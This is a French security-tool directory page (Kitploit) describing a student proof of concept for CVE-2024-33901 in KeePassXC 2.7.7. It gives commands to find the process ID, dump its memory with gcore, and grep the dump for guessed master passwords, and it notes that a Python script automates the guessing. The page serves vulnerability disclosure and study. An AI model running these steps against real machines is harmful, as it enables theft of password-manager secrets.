Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-33901-ProofOfConcept — Programme court qui démontre la vulnérabilité CVE-2024-33901 dans KeePassXC version 2.7.7 | Kitploit
Outils/GitHubGitHub/gmikisilva/cve-2024-33901-proofofconcept
Cassage de Mots de PasseCriminalistique MémoireAnalyse des VulnérabilitésExploitationExfiltration de DonnéesCriminalistique Numérique
GitHubgmikisilva/cve-2024-33901-proofofconcept

CVE-2024-33901-ProofOfConcept

Programme court qui démontre la vulnérabilité CVE-2024-33901 dans KeePassXC version 2.7.7

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
2il y a 1 anPas encore vérifié

CVE-2024-33901-ProofOfConcept

Programme court qui démontre la vulnérabilité CVE-2024-33901 dans KeePassXC version 2.7.7

Le rapport pour le cours pourrait nécessiter le code source lié, c'est pourquoi j'ai créé ce dépôt.

Comment reproduire la vulnérabilité

  1. Ouvrez KeePassXC et authentifiez la base de données
  2. Pendant que la base de données est authentifiée, créez un fichier de vidage mémoire (dump) pour celle-ci

Cela peut être réalisé en obtenant le PID, ce qui peut être fait avec cette commande :

root@kitploit:~
ps aux | grep keepassxc

Puis en exécutant cette commande : sudo gcore -o keepassxc_dump PID_HERE

Par exemple, si le PID que vous avez obtenu est 1234, alors la commande doit être :

root@kitploit:~
sudo gcore -o keepassxc_dump 1234

3. Enfin, vous pouvez exécuter cette commande : cat keepassxc_dump.PID_HERE | strings | grep "password guess here"

Donc si le PID était 1234, la commande serait :

root@kitploit:~
 cat keepassxc_dump.1234 | strings | grep "password guess here"

Une fois le fichier de vidage mémoire créé, l'attaque peut être réalisée même si la base de données est à nouveau verrouillée ou si KeePassXC est fermé.

Le code Python fourni effectue toutes ces étapes et tente plusieurs suppositions de mot de passe basées sur les fichiers texte fournis.

Télécharger l’outil